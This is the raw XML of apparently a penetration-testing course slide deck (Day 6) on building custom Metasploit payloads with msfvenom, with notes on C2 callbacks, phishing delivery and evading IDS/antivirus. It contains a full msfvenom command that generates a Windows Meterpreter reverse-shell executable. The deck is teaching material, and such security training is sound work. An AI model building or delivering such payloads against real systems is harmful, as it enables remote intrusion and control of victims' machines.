                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>runs when an exploit successfully compromises a system.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2080" name="Google Shape;2080;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725700" y="1829402"/>
            <a:ext cx="1049850" cy="15359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12089"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2084"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2085" name="Google Shape;2085;p111"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="30353" t="29075" r="30622" b="28627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084721" y="675975"/>
            <a:ext cx="4950828" cy="4024449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2086" name="Google Shape;2086;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a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2087" name="Google Shape;2087;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(Source)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Google Shape;2088;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Custom Payloads</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2089" name="Google Shape;2089;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="4536600" cy="1900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Since C2 servers have dynamic </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP addresses, attackers often have to create their own customized payloads that call back to their</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2 server using SYN packets.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="Google Shape;2090;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497425" y="2974425"/>
            <a:ext cx="2684400" cy="1134300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AEE0F6"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="137150" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom payloads allow customization of various payload options, such as architecture and shell type.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Google Shape;2091;p111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159175" y="606875"/>
            <a:ext cx="8764800" cy="129300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="512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2" name="Google Shape;2092;p111"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274375" y="640080"/>
            <a:ext cx="8595600" cy="1020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0DCE8"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 2096"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097" name="Google Shape;2097;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Custom Payloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2098" name="Google Shape;2098;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Think back to last class when we used the following command to create a payload:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2099" name="Google Shape;2099;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
        <p:nvSpPr>
          <p:cNvPr id="2100" name="Google Shape;2100;p112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403650" y="1243600"/>
            <a:ext cx="8336700" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10369"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CAFBFC"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="5ACA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50">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=4444 -f exe R &gt; hack.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2101" name="Google Shape;2101;p112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561950" y="2713088"/>
            <a:ext cx="3854100" cy="1064400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6083"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2A6692"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0D78B9"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="365750" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Today, we'll use Metasploit to create payloads like this one.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2102" name="Google Shape;2102;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="10262" t="4101" r="13267" b="5154"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909550" y="2038889"/>
            <a:ext cx="2204400" cy="261617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13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352725" y="1602525"/>
            <a:ext cx="4675800" cy="21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1">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="434343"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="434343"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="434343"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>is a Metasploit framework tool used to generate and encode payloads.</a:t>
            </a:r>
            <a:endParaRPr sz="24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sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2108" name="Google Shape;2108;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pic>
        <p:nvPicPr>
          <p:cNvPr id="2109" name="Google Shape;2109;p113"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673326" y="1602513"/>
            <a:ext cx="1310050" cy="1916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13"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2114" name="Google Shape;2114;p114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083100" y="-9175"/>
            <a:ext cx="5073300" cy="5152800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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2116" name="Google Shape;2116;p114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083100" y="412900"/>
            <a:ext cx="504600" cy="376200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="-9175"/>
            <a:ext cx="4266600" cy="5152800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DE6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8" name="Google Shape;2118;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="22340" t="12252" r="22605" b="11926"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4422600" y="193425"/>
            <a:ext cx="4523500" cy="4672500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2119" name="Google Shape;2119;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1461925"/>
            <a:ext cx="4266600" cy="11286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While it’s relatively easy to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create custom payloads,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the real challenge is creating a payload that bypasses network detection by IDS and antivirus (AV) solutions.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2120" name="Google Shape;2120;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2121" name="Google Shape;2121;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="40497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r>
              <a:rPr lang="en" sz="700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>(Source)</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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683</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>77</Paragraphs>
  <Slides>19</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Roboto Medium</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Penetration Testing Day 6 </vt:lpstr>
      <vt:lpstr>Class Objectives</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attackers typically build custom payloads that they can use in phishing emails or add to their websites. When an unsuspecting user clicks the link for the malicious payload, their computer is infected. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Custom Payloads</vt:lpstr>
      <vt:lpstr>Creating Custom Payloads</vt:lpstr>
      <vt:lpstr> msfvenom  is a Metasploit framework tool used to generate and encode payloads. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Msfvenom Encoding</vt:lpstr>
      <vt:lpstr>Now we’ll walk through the basics of msfvenom’s help menu and some basic command options for use with encoders, payloads, and formats. </vt:lpstr>
      <vt:lpstr>Custom Payloads with msfvenom</vt:lpstr>
      <vt:lpstr>Msfvenom Syntax</vt:lpstr>
      <vt:lpstr>25 Minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>For the rest of this class,  we will work on an activity  that simulates all levels of a penetration test engagement.  </vt:lpstr>
      <vt:lpstr>Activity: Penetration Test In this activity you will gain access to a target  machine and retrieve valuable data. You will also complete a report detailing the process.  Unfinished work will be completed for homework. </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Testing Day 6 </dc:title>
  <cp:lastModifiedBy>Dan Schmidt</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-17T13:27:48Z</dcterms:modified>
</cp:coreProperties>
</file>